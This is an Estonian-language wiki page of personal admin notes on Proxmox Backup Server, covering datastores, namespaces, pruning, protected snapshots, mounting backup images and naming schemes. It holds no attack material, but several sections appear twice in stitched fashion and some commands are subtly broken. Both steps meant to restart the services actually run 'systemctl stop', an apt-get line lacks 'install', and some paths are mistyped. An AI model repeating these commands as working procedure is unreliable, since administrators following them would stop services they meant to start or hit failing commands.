# wget http://download.proxmox.com/debian/proxmox-ve-release-6.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-6.x.gpg

Moodustada source fail

# cat /etc/apt/sources.list.d/pbs-client.list
deb [arch=amd64] http://download.proxmox.com/debian/pbs-client buster main

Paigaldada tarkvara

# apt-get update
# apt-get proxmox-backup-client

===Namespace kasutamine===

TODO

<pre>
root@tmp-pbs:~# proxmox-backup-client namespace list --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
Password for "root@pam": ************
root@tmp-pbs:~# proxmox-backup-client namespace create tere --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
root@tmp-pbs:~# proxmox-backup-client namespace list --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
tere
</pre>

===Misc===

PBS töötamise käigus kasutatakse katalooge selliselt

<pre>
# ls -ld /srv/pbs-rmt/* /srv/pbs-rmt/ns/* /srv/pbs-rmt/.chunks /srv/pbs-rmt/ns/tmp-pve-1/vm/5001/*/*
drwxr-x--- 1 backup backup 1060864 Dec 17 16:27 /srv/pbs-rmt/.chunks
drwxr-xr-x 3 backup backup 4096 Dec 17 16:33 /srv/pbs-rmt/ns
drwxr-xr-x 3 backup backup 4096 Dec 17 16:33 /srv/pbs-rmt/vm
drwxr-xr-x 3 backup backup 4096 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tartu
drwxr-xr-x 3 backup backup 4096 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn
-rw-r--r-- 1 backup backup 627 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/client.log.blob
-rw-r--r-- 1 backup backup 86016 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/drive-virtio0.img.fidx
-rw-r--r-- 1 backup backup 422 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/index.json.blob
-rw-r--r-- 1 backup backup 355 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/qemu-server.conf.blob
...
</pre>

kus

* /srv/pbs-rmt/ns/ns-pve-tartu - konkreetsele namespace'ile vastav kataloog, tõenäoliselt varundatakse ühe namespace alla ühte pve setup'i (kas standalone proxmox või pve klaster); üks pbs võimaldab namespace instrumendi abil teenindada mitmete pve setup'ide varundamist seejuures vältides vmid väärtuste jms konflikte
* /srv/pbs-rmt/.chunks - varundatud andmed (siin toimub dedupleerimine, pakkimine jms) - seal on koos kõigi namespace'ide alla kuuluvad andmed
* /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z - arvuti vmid=5001 ühele konkreetsele varunduskorrale (tavaliselt on selliseid kuupäeva + kellaaeg nimelisi kataloogi mitu) vastvad metaandmeid; selle info abil oskab pbs taastada sh leiab üles .chunks kataloogist vajalikud varundatud andmed
* /srv/pbs-rmt/vm - namespace eelse aja varunduskorra metaandmete kataloog - vastab praegu namespace nimele 'Root'

Väited

* namespace eelsel ajal liigendati mitut pve setuppi teenindava pbs serveri sees varundamisi erinevate datastore'ide moodustamise abil; namespace ajal kasutatakse pigem ühte datastore'i ning selle see liigendatakse erinevaid pve setuppisid namespace instrumendi abil
* tundub, et pbs webgui ja proxmox-backup-client utiliidile lisaks saab teatud tegevusi edukalt sooritada ka niisama ehedalt /etc/proxmox-backup-server kataloogi aluseid faile redigeerides
* tundub, et pbs serverisse moodustatud datastore'ile vastavat kataloogi (koos kogu selle sisuga) saab liigutada edukalt ühelt pbs serverilt teisele ja edasi kasutada (nt taasteks)
* tundub, et 1st ja 2nd proxmox serverisse moodustatud datastore on iseenesest täpselt samaväärne (nt saab ühe pve setup jaoks kasutusel olevat 2nd (ehk remote) pbs arvutit kasutada teise pve setup juures 1st pbs arvutina
* tundub, et pbs on väga robustne tarkvara, st tema töötamisega ei kaasne mingeid salajasi binari andmebaase vms - kõik vajalik on /etc/proxmox-backup-server kataloogis või nö /srv/pbs failisüsteemis ja seadistused on tekstifailide kujul mida saab ettevaatlikult ka käsitsi tekstiredaktoriga hallata

===Robustsed tegevused===

Sarnaselt nagu tar programmiga on võimalik töötada .tar arhiivi failiga, muu hulgas

* moodustada arhiivi
* esitada arhiivi kopeeritud failide nimekiri
* kopeerida arhiivist välja
* lisada faile arhiivi
* eemaldada faile arhiivist

on võimalik PBS tarkvaraga teha samu tegevusi, kuid natuke teisel abstraktsiooni tasemel

* seadistada pbs varunduse serverisse datastore
* kopeerida PVE keskkonnast virtuaalsete arvutite virtuaalseid plokkseadmeid datastore'i (virtuaalsele arvutile vastava komplektina)
* eemaldada PBS datastore pealt sinna kopeeritud arvuteid
* esitada datastore peale kopeeritud arvutite nimekiri
* kontrollida datastore peal olevate andmete terviklust

Väited

* kui tar puhul on tööriistaks programm 'tar', siis pbs puhul on tööriistaks debian operatsioonisüsteem ja sellesse paigaldatud pbs tarkvara
* kui tar puhul on andmeteks .tar arhiiv st üks fail (seal on nii andmed kui metaandmed), siis pbs puhul on andmeteks /srv/pbs/.chunks, /srv/pbs/ns jt kataloogid (seal on nii andmed kui metaandmed)
* kui .tar arhiivist ei ole praktiliselt mõeldav mingi konkreetse andme kätte saamine ilma tar utiliidita, siis pbs puhul on olukord sarnane
* .tar arhiiv on võimalik moodustada ühes arvutis ja kasutada teises arvutis (natuke erineva tar programmi versiooniga), pbs puhul on olukord sarnane

Tundub, et robustsete tegevuste eel on tark pbs protsessid ära lõpetada

# systemctl stop proxmox-backup proxmox-backup-proxy

ja seejärel on nt võimalik

* tekitada namespace'isid moodutades katalooge /srv/pbs/ns kataloogi alla

# mkdir /sv/pbs-tmp/ns/ns-tmp-4
# chown backup:backup /srv/pbs-tmp/ns/ns-tmp-4

* liigutada ns katalooge failisüsteemi tasemel ringi, tulemusena moodustub uus namespace ja see on ka sisustatud

# mv /sv/pbs-tmp/ns/ns-tmp-4 /sv/pbs-tmp/ns/ns-tmp-5

* TODO

Peale robustsete tegevuste lõppu pbs protsessid käivitada

# systemctl stop proxmox-backup proxmox-backup-proxy

===Objektide nimetamine===

PBS tarkvara kasutamisel tuleb tegeleda kümnekonna objektiga (ressursside nimetamised, kasutajate nimetamised jms) ning asjakorraldust lihtsustab kui nende nimetamine on läbimõeldud. Järgnevas on esitatud üks võimalus

* selguse mõttes on erinevat tüüpi objektide nimesid alustatud tüübile viitava prefixiga (nt 'user-')

pbs 1st arvuti kasutajate nimekirjas on eemalt sisse pöörduvate kasutajate kirjeldused. Need kasutajad võiks nimetada nt nende pöördumise kohtade alusel, nt

* user-pve-tartu
* user-pve-tallinn

pbs 2nd arvutis võiks namespace'id nimeteada samuti pöördumiskohtade järgi, st varundatavate pve klastrite järgi

* ns-tartu
* ns-tallinn

eeldades, et kõik varundatavad asjad satuvad samasse datastore'i siis võib olla pbs arvutite datastore võiks nimetada mingi tehnoloogilise erinevus alusel, nt

* ds-ssd
* ds-hdd

datastorele vastav kataloog pbs arvutis, nt

* /srv/pbs-ssd
* /srv/pbs-hdd
* /srv/pbs-zfs

2nd pbs arvutis kirjeldatakse ära remote, st 1st pbs arvuti kust juba varundatud asju kopeeritakse. Üks 2nd pbs arvuti saab kopeerida mitmest 1st arvutist endale kokku andmeid (soovitavalt erinevatesse namespace'idesse). Sõna 'remote' kasutatakse siin natuke vastuoluliselt, eks. Nimetada võiks selle järgi kust kopeeritakse, nt

* rmt-pbs-tartu-1st
* rmt-pbs-tallinn-1st

PBS tüüpi storage nimetamine PVE Datacenter -> Storage osakonnas dialoogi lahtri 'ID' väärtuse mõttes. Võiks viidata pbs arvuti nimele ja rollile (kas 1st või 2nd), nt (sid nagu 'storage id')

* sid-pbs-narva-1st
* sid-pbs-parnu-2nd

PVE arvutite nimetamine

* pve-tartu-01, pve-tartu-02
* pve-tallinn-01, pve-tallinn-02

PBS arvutite nimetamine

* pbs-narva-1st
* pbs-parnu-2nd

===Jõudluse hindamine - benchmark===

PVE ja PBS vahelise kontakti jõudluse hindamiseks sobib kasutada proxmox-backup-client programmi 'benchmark' osakonna funktsionaalsust

<pre>
root@pve-moraal-x570:~# proxmox-backup-client benchmark --repository pm60-trt@pbs@192.168.10.197:ds-ssd
Password for "pm60-trt@pbs": ****************
fingerprint: 64:3b:cb:fb:94:c3:c9:da:92:b9:02:68:36:2c:49:b8:12:87:09:66:98:f7:b8:ad:89:9b:cd:94:c4:bc:0f:c9
Are you sure you want to continue connecting? (y/n): y
fingerprint: 64:3b:cb:fb:94:c3:c9:da:92:b9:02:68:36:2c:49:b8:12:87:09:66:98:f7:b8:ad:89:9b:cd:94:c4:bc:0f:c9
Are you sure you want to continue connecting? (y/n): y
Uploaded 610 chunks in 5 seconds.
Time per request: 8268 microseconds.
TLS speed: 507.24 MB/s
SHA256 speed: 2308.48 MB/s
Compression speed: 645.59 MB/s
Decompress speed: 759.50 MB/s
AES256/GCM speed: 1673.09 MB/s
Verify speed: 568.91 MB/s
┌───────────────────────────────────┬─────────────────────┐
│ Name │ Value │
╞═══════════════════════════════════╪═════════════════════╡
│ TLS (maximal backup upload speed) │ 507.24 MB/s (41%) │
├───────────────────────────────────┼─────────────────────┤
│ SHA256 checksum computation speed │ 2308.48 MB/s (114%) │
├───────────────────────────────────┼─────────────────────┤
│ ZStd level 1 compression speed │ 645.59 MB/s (86%) │
├───────────────────────────────────┼─────────────────────┤
│ ZStd level 1 decompression speed │ 759.50 MB/s (63%) │
├───────────────────────────────────┼─────────────────────┤
│ Chunk verification speed │ 568.91 MB/s (75%) │
├───────────────────────────────────┼─────────────────────┤
│ AES256 GCM encryption speed │ 1673.09 MB/s (46%) │
└───────────────────────────────────┴─────────────────────┘
</pre>

===2026 kevad märkused===

====PBS v. 3 - v. 4 uuendus====

Väited

* Debian v. 12 -> v. 13
* kernel 6.x -> 7.x
* zfs v. x -> 2.4.1

Enne uuendust võiks küsida

<pre>
# pbs3to4 --full
</pre>

====Kasulikud lisamaterjalid====

* https://pbs.proxmox.com/wiki/Upgrade_from_3_to_4

===Kasulikud lisamaterjalid===

* https://pve.proxmox.com/wiki/Backup_and_Restore
* https://git.proxmox.com/?p=pve-qemu.git;a=blob_plain;f=backup.txt

Proxmox Backup Server

2026-05-02T12:22:47Z

Imre: /* 20260502 märkused */

===Sissejuhatus===

TODO

===Mõisted===

* PBS - Proxmox Backup Server
* PVE - Proxmox Virtualization Environment
* DS - datastore
* NS - namespace
* GC - garbage collect
* Purne -

===Tööpõhimõte===

Väited

* PBS vaikimisi pakib, st ei ole mõtet kasutada PBS storage juures pakkivat failisüsteemi vms (nt 'zfs create -o compression=lz4 ...' vms; tundub, et failisüstteemi pakkimise kasutmine ei muuda varundamiseks kuluvat aega ega mahtu, aga pbs serverile tekib natuke rohkem cpu koormust)
* PBS tegleb ise pakkimisega ja paistab, et seda ei saagi välja lülitada (nt proxmox pve webgui haldusliideses backup käivitamise on 'Compression: ZSTD (fast and good)' greyed-out
* mitu PSB serverit saab omavahel nö kokku aheldada, tulemusena tekib mitme etapiline varundus (varundus varundab varundust)

Kasutusalad

* varundatud ja riknenud arvuti asendamine varundusest taastatud arvutiga
* varundatud arvuti taastamine teisse proxmox klastrisse (nt kontrolli või uuringu eesmärgil)

Üks võimalik kasutusjuhtum

<pre>
CLTARTU

pve-tartu-1 pve-tartu-2 pve-tartu-n
__________________ __________________ __________________
| | | | | |
| vm1 (vmid=1001) | | vm3 (vmid=1003) | | vm5 (vmid=1005) |
| vm2 (vmid=1002) | | vm4 (vmid=1004) | | vm6 (vmid=1006) |
|__________________| |__________________| |__________________|
| | |
| | |
-----------|-----------------|------|---------------------|--|-----------
| |
| | |
| _______|_______ ________|________
| | | | |
'---------> | ns-tartu | <------- | ns-tartu |
| | | |
| pbs-tartu-1st | | pbs-tallinn-2nd |
| | | |
,---------> | ns-tallinn | <------- | ns-tallinn |
| |_______________| |_________________|
| | |
| | |
| |
----------|------------------|------|---------------------|-|---------------
| | |
| | |
________|_________ _________|________ ________|_________
| | | | | |
| vm1 (vmid=1001) | | vm3 (vmid=1003) | | vm5 (vmid=1005) |
| vm2 (vmid=1002) | | vm4 (vmid=1004) | | vm6 (vmid=1006) |
|__________________| |__________________| |__________________|

pve-tallinn-1 pve-tallinn-2 pve-tallinn-n

CLTALLINN
</pre>

kus

* pve-1, 2 ja 3 on proxmox virtual environment host arvutid
* vm1, vm2 ... vm6 on pve peal töötavad virtuaalsed arvutid
* pbs-1st on proxmox backup server abil realiseeritud esimese taseme varundus
* pbs-2nd on proxmox backup server abil realiseeritud teise taseme varundus
* pve-1 ... 3 peavad reeglina asuma samas subnetis
* pbs-1st ja 2nd ei pea asuma samas subnetis pve arvutitega ega ise üksteisega
* CLTARTU ja CLTALLINN - PVE klastrite nimed

Varundamisega seotud võrguliiklus

* andmeliikluse algamise mõttes pöörduvad nii vmN arvutid kui pbs-2nd arvuti pbs-1st arvuti poole

===Paigaldamine===

TODO

===Seadistamine===

TODO

====Datastore lisamine - pbs ja webgui====

Järgneva eelduseks on, et pbs on paigaldatud ning arvutis on üks kasutamata /dev/vdc vms plokkseade. Datastore on võimalik seadistada pbs webgui liidese abil

Administration -> Storage/Disks -> Directory -> Create: Directory

ning avanenud dialoogis täita lahtrid

* Disk - /dev/vdc
* Filesystem - ext4
* Name - ds-pbs-tmp
* Add as Datastore - linnutada

Tulemusena tekitatakse systemd mount objekt, mis monteerib failisüsteemi /mnt/datastore alamkataloogiks

<pre>
# cat /etc/systemd/system/mnt-datastore-ds\\x2dpbs\\x2dtmp.mount
[Unit]
Description=Mount datatstore 'ds-pbs-tmp' under '/mnt/datastore/ds-pbs-tmp'

[Install]
WantedBy=multi-user.target

[Mount]
Options=defaults
Type=ext4
What=/dev/disk/by-uuid/5d52fefc-212a-45dc-ab68-dc55dc3ed051
Where=/mnt/datastore/ds-pbs-tmp
</pre>

mis täpsemalt paistab nii

<pre>
# df -t ext4 -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/pbs-root 21G 1.8G 19G 9% /
/dev/vdc1 108G 258M 102G 1% /mnt/datastore/ds-pbs-tmp
</pre>

ning lisaks võetakse kasutusele datastore'ina

<pre>
# cat /etc/proxmox-backup/datastore.cfg
datastore: ds-pbs-tmp
path /mnt/datastore/ds-pbs-tmp
</pre>

Siin on mitu nö probleemi

* ketas partitsioneeritakse - see teeb ebamugavaks /dev/vdc suurendamise, käigult ei saagi hästi suurendada
* süsteemis osa failisüsteeme monteeritakse /etc/fstab abil ja osa systemd vahenditega
* /mnt alune on üldiselt natuke ebaloomulik koht püsivaks kasutuseks asjade pidamiseks (/mnt on ad hoc monteerimisteks, ja /srv püsivateks) - vt https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard

====Datastore lisamine - käsitsi ja webgui====

Ehk otsekohesem ja ka suurema kontrolli tulemuse üle saab nö tavalisel viisil monteerides /etc/fstab abil /srv/pbs alla failisüsteemi ning siis webgui pealt seadistada pbs tarkvara seda kasutama.

# pvcreate /dev/vdc
# vgcreate vg_pbs /dev/vdc
# lvcreate -l +100%FREE -n srv_pbs vg_pbs
# mkfs.ext4 /devv/vg_pbs/srv_pbs
# # cat /etc/fstab
...
/dev/vg_pbs/srv_pbs /srv/pbs ext4 defaults 0 0
# mkdir /srv/pbs
# mount /srv/pbs

ext4 failisüsteemi kasutamisel kasutatakse veel nö vahel lisaks lvm kihti, see teeb võimalikud muudatused sujuvamaks, nt saab kunagi plokkseadme asendada käigult pvmove abil.

Kui /srv/pbs kataloogi alla on failisüsteem monteeritud, siis sobib webgui peal öelda

Datastore -> Add Datastore

ning täita lahtrid

* Name - ds-pbs
* Backing Path: /srv/pbs

===Kasutamine - varundamine===

TODO

Seadistatud ja varundamisega tegelevas PBS serveris on muu hulgas sellised failid

* datastore'ide kirjeldus - /etc/proxmox-backup/datastore.cfg
* proxmox kasutajatega seotud andmed - shadow.json, user.cfg ja acl.cfg
* 2nd stage kopeerimise ligipääsu kirjeldus - /etc/proxmox-backup/remote.cfg

===Kasutatamine - taastamine===

TODO

===Haldamine===

Tundub, et pbs tarkvara juhtimiseks on kaks käivitusskripti, seiskamiseks

# systemctl stop proxmox-backup-proxy
# systemctl stop proxmox-backup

käivitamiseks

# systemctl stop proxmox-backup
# systemctl stop proxmox-backup-proxy

proxmox-backup-proxy kuulab 8007 võrku, apt teenus jms

<pre>
root@varundus-2nd:/srv# netstat -lnpt | grep backup
tcp 0 0 127.0.0.1:82 0.0.0.0:* LISTEN 3461/proxmox-backup
tcp6 0 0 :::8007 :::* LISTEN 3476/proxmox-backup

root@varundus-2nd:/srv# ps aux | grep 3476
backup 3476 16.6 1.6 844856 51096 ? Ssl 21:59 0:32 /usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-proxy
</pre>

Andmesalvestuse asukohtade jms seadistused asuvad failis

<pre>
root@pbs:~# cat /etc/proxmox-backup/datastore.cfg
datastore: ds_zpool_wds_pbs
comment
gc-schedule daily
path /zpool_wdc/pbs
prune-schedule daily
...
</pre>

===PBS schedule kasutamine===

Väited

* virtuaalsete arvutite regulaarsed varundamised seadistatakse Proxmox VE keskkonnas (nt proxmox hostide webgui haldusliidestes)
* varundamine toimib proxmox host algatusel
* varundatud varunduste regulaarne harvendamine toimub proxmox backup serveri webgui haldusliideses seadistatu alusel; ja pbs algatusel
* Prune - tegeleb nö kataloogist vana varunduse eemaldamisega
* GC (garbage collection) - tegeleb kataloogist kustatule vastavate andmete osa vabastamisega salvestusseadmelt

====Regulaarsete varundamiste seadistamine - PVE====

Virtuaalse arvuti regulaarse varundamise seadistamiseks sobib virtuaalse arvuti juures veenduda, et plokkseadmete juures ei ole märget

backup=0

Seejärel avada

Datacenter -> Backup -> Add (või Edit kui juba on olemas)

ning linnutada ära sobiv arvuti.

====Regulaarsete kustutamise seadistamine - PBS====

Logida sisse varundamise arvutisse ja valida

Datastore -> ds_nimi -> Prune & GC

ning seadistada Prune rutiin

* Keep Last
* Keep Hourly
* ..
* Keep Yearly

ning seadistada Prune ja CG alguse aeg.

====Protected====

Vaikimisi prunemine kustutab hiljem või varem kõik varundused ära. Kui soovitakse mõnda seisu (olgu see moodustunud automaatselt või käsitsi) säilitada lõpmatult kaua, siis sobib märkida ta Protected olekusse. Seda saab teha PVE 7.1 webgui liideses, ja PBS v. 2.1 webgui liidses

Datastore -> ds_nimi -> Content -> Group -> snapshot

* group - virtuaalne arvuti
* snapshot - konkreetsele ajale vastav varundus

Kõigi toimunud varunduste protected olekusse seadistamiseks sobib öelda

<pre>
# export PBS_PASSWORD="xxx"
# cat pbs-protected.sh
for i in `proxmox-backup-client list --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff | awk {'print $2'} | grep "^vm"`; do
for j in `proxmox-backup-client snapshot list ${i} --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff | awk {'print $2'} | grep ^vm`; do
proxmox-backup-client snapshot protected update ${j} true --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff;
done;
done

# sh pbs-protected.sh
</pre>

Edukast tulemusest annab tunnistust varunduste Content vaates, et snaphost real on Protected pildike muutunud hallist roheliseks.

====Prune simulator====

Aadressil https://pbs.proxmox.com/docs/prune-simulator/ asub tore simulaator, mille abil illustreeritakse milliseid konkreetseid varundusi prunemine tabab.

====Märkused====

Varundamise kasutamine võib olla lihtsam ja varundus kvaliteetsem (kooskõlalisem) kui varundatavate arvutite failisüsteemid ei ole laiali määritud mitmele plokkseadmele (nt lvm volume group asub ühel virtio plokkseadmel).

====Kasulikud lisamaterjalid====

* https://pbs.proxmox.com/docs/prune-simulator/

===PVE integreeritud varunduse kasutamine proxmox-backup-client abil===

PVE integreeritud varunduse kasutamiseks on vaja

* varundatud andmeid PBS serveris
* varunduse serverile üle nn api port 8007 liidese ligipääsu
* teada datastore nime varunduse arvutis
* nö klientarvutit kuhu on paigaldatud proxmox-backup-client tarkvara (see võiks olla nö kolmas arvuti, st mitte pbs ega varundatud arvuti ise)

Varundatud arvutite nimekirja küsimine (nn group'id)

# proxmox-backup-client list --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
Password for "pm60-trt@pbs":

Varundatud arvuti varunduste nimekirja küsimine (nn snapshot'id)

<pre>
# proxmox-backup-client snapshot list vm/194 --output-format text --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
┌─────────────────────────────┬────────┬────────────────────────────────────────────────────────────────────────────┐
│ snapshot │ size │ files │
╞═════════════════════════════╪════════╪════════════════════════════════════════════════════════════════════════════╡
│ vm/194/2021-01-02T13:23:12Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
├─────────────────────────────┼────────┼────────────────────────────────────────────────────────────────────────────┤
│ vm/194/2021-01-02T14:26:53Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
├─────────────────────────────┼────────┼────────────────────────────────────────────────────────────────────────────┤
│ vm/194/2021-10-09T20:59:42Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
└─────────────────────────────┴────────┴────────────────────────────────────────────────────────────────────────────┘
</pre>

Protection muutmine

# proxmox-backup-client snapshot protected update vm/194/2021-01-02T13:23:12Z true --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client snapshot protected update vm/194/2021-01-02T13:23:12Z false --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff

Tõmmise kasutamine

# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio0.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio1.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio2.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff

kui virtuaalses arvuti on moodustatud neile nt lvm, siis tuleks öelda

# vgchange -a y
# lvdisplay
# mount -o ro,norecovery /dev/sys/root /mnt/root

Seejärel saab /mnt/root alt kasutada varundatud seisu nii nagu tavalist read-only failisüsteemi. Kasutamise lõpetamiseks sobib öelda

# umount /mnt/root
# vgchange -a n
# proxmox-backup-client unmap drive-virtio0.img
# proxmox-backup-client unmap drive-virtio1.img
# proxmox-backup-client unmap drive-virtio2.img

ilma viimase argumendita esitatakse mapped ressursside nimekiri

<pre>
# proxmox-backup-client unmap
/dev/loop26: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio2.img
/dev/loop25: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio1.img
/dev/loop24: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio0.img
</pre>

proxmox-backup-client nn kolmanda arvuti ettevalmistamine

Esmalt paigaldada Ubuntu 20.04 või Debian v. 10 või v. 11 nö tavaliselt viisil. Seejärel lisada repo võti, nt Ubuntu 20.04 puhul

# wget http://download.proxmox.com/debian/proxmox-ve-release-6.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-6.x.gpg

Moodustada source fail

# cat /etc/apt/sources.list.d/pbs-client.list
deb [arch=amd64] http://download.proxmox.com/debian/pbs-client buster main

Paigaldada tarkvara

# apt-get update
# apt-get proxmox-backup-client

===Namespace kasutamine===

TODO

<pre>
root@tmp-pbs:~# proxmox-backup-client namespace list --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
Password for "root@pam": ************
root@tmp-pbs:~# proxmox-backup-client namespace create tere --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
root@tmp-pbs:~# proxmox-backup-client namespace list --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
tere
</pre>

===Misc===

PBS töötamise käigus kasutatakse katalooge selliselt

<pre>
# ls -ld /srv/pbs-rmt/* /srv/pbs-rmt/ns/* /srv/pbs-rmt/.chunks /srv/pbs-rmt/ns/tmp-pve-1/vm/5001/*/*
drwxr-x--- 1 backup backup 1060864 Dec 17 16:27 /srv/pbs-rmt/.chunks
drwxr-xr-x 3 backup backup 4096 Dec 17 16:33 /srv/pbs-rmt/ns
drwxr-xr-x 3 backup backup 4096 Dec 17 16:33 /srv/pbs-rmt/vm
drwxr-xr-x 3 backup backup 4096 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tartu
drwxr-xr-x 3 backup backup 4096 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn
-rw-r--r-- 1 backup backup 627 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/client.log.blob
-rw-r--r-- 1 backup backup 86016 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/drive-virtio0.img.fidx
-rw-r--r-- 1 backup backup 422 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/index.json.blob
-rw-r--r-- 1 backup backup 355 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/qemu-server.conf.blob
...
</pre>

kus

* /srv/pbs-rmt/ns/ns-pve-tartu - konkreetsele namespace'ile vastav kataloog, tõenäoliselt varundatakse ühe namespace alla ühte pve setup'i (kas standalone proxmox või pve klaster); üks pbs võimaldab namespace instrumendi abil teenindada mitmete pve setup'ide varundamist seejuures vältides vmid väärtuste jms konflikte
* /srv/pbs-rmt/.chunks - varundatud andmed (siin toimub dedupleerimine, pakkimine jms) - seal on koos kõigi namespace'ide alla kuuluvad andmed
* /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z - arvuti vmid=5001 ühele konkreetsele varunduskorrale (tavaliselt on selliseid kuupäeva + kellaaeg nimelisi kataloogi mitu) vastvad metaandmeid; selle info abil oskab pbs taastada sh leiab üles .chunks kataloogist vajalikud varundatud andmed
* /srv/pbs-rmt/vm - namespace eelse aja varunduskorra metaandmete kataloog - vastab praegu namespace nimele 'Root'

Väited

* namespace eelsel ajal liigendati mitut pve setuppi teenindava pbs serveri sees varundamisi erinevate datastore'ide moodustamise abil; namespace ajal kasutatakse pigem ühte datastore'i ning selle see liigendatakse erinevaid pve setuppisid namespace instrumendi abil
* tundub, et pbs webgui ja proxmox-backup-client utiliidile lisaks saab teatud tegevusi edukalt sooritada ka niisama ehedalt /etc/proxmox-backup-server kataloogi aluseid faile redigeerides
* tundub, et pbs serverisse moodustatud datastore'ile vastavat kataloogi (koos kogu selle sisuga) saab liigutada edukalt ühelt pbs serverilt teisele ja edasi kasutada (nt taasteks)
* tundub, et 1st ja 2nd proxmox serverisse moodustatud datastore on iseenesest täpselt samaväärne (nt saab ühe pve setup jaoks kasutusel olevat 2nd (ehk remote) pbs arvutit kasutada teise pve setup juures 1st pbs arvutina
* tundub, et pbs on väga robustne tarkvara, st tema töötamisega ei kaasne mingeid salajasi binari andmebaase vms - kõik vajalik on /etc/proxmox-backup-server kataloogis või nö /srv/pbs failisüsteemis ja seadistused on tekstifailide kujul mida saab ettevaatlikult ka käsitsi tekstiredaktoriga hallata

===Robustsed tegevused===

Sarnaselt nagu tar programmiga on võimalik töötada .tar arhiivi failiga, muu hulgas

* moodustada arhiivi
* esitada arhiivi kopeeritud failide nimekiri
* kopeerida arhiivist välja
* lisada faile arhiivi
* eemaldada faile arhiivist

on võimalik PBS tarkvaraga teha samu tegevusi, kuid natuke teisel abstraktsiooni tasemel

* seadistada pbs varunduse serverisse datastore
* kopeerida PVE keskkonnast virtuaalsete arvutite virtuaalseid plokkseadmeid datastore'i (virtuaalsele arvutile vastava komplektina)
* eemaldada PBS datastore pealt sinna kopeeritud arvuteid
* esitada datastore peale kopeeritud arvutite nimekiri
* kontrollida datastore peal olevate andmete terviklust

Väited

* kui tar puhul on tööriistaks programm 'tar', siis pbs puhul on tööriistaks debian operatsioonisüsteem ja sellesse paigaldatud pbs tarkvara
* kui tar puhul on andmeteks .tar arhiiv st üks fail (seal on nii andmed kui metaandmed), siis pbs puhul on andmeteks /srv/pbs/.chunks, /srv/pbs/ns jt kataloogid (seal on nii andmed kui metaandmed)
* kui .tar arhiivist ei ole praktiliselt mõeldav mingi konkreetse andme kätte saamine ilma tar utiliidita, siis pbs puhul on olukord sarnane
* .tar arhiiv on võimalik moodustada ühes arvutis ja kasutada teises arvutis (natuke erineva tar programmi versiooniga), pbs puhul on olukord sarnane

Tundub, et robustsete tegevuste eel on tark pbs protsessid ära lõpetada

# systemctl stop proxmox-backup proxmox-backup-proxy

ja seejärel on nt võimalik

* tekitada namespace'isid moodutades katalooge /srv/pbs/ns kataloogi alla

# mkdir /sv/pbs-tmp/ns/ns-tmp-4
# chown backup:backup /srv/pbs-tmp/ns/ns-tmp-4

* liigutada ns katalooge failisüsteemi tasemel ringi, tulemusena moodustub uus namespace ja see on ka sisustatud

# mv /sv/pbs-tmp/ns/ns-tmp-4 /sv/pbs-tmp/ns/ns-tmp-5

* TODO

Peale robustsete tegevuste lõppu pbs protsessid käivitada

# systemctl stop proxmox-backup proxmox-backup-proxy

===Objektide nimetamine===

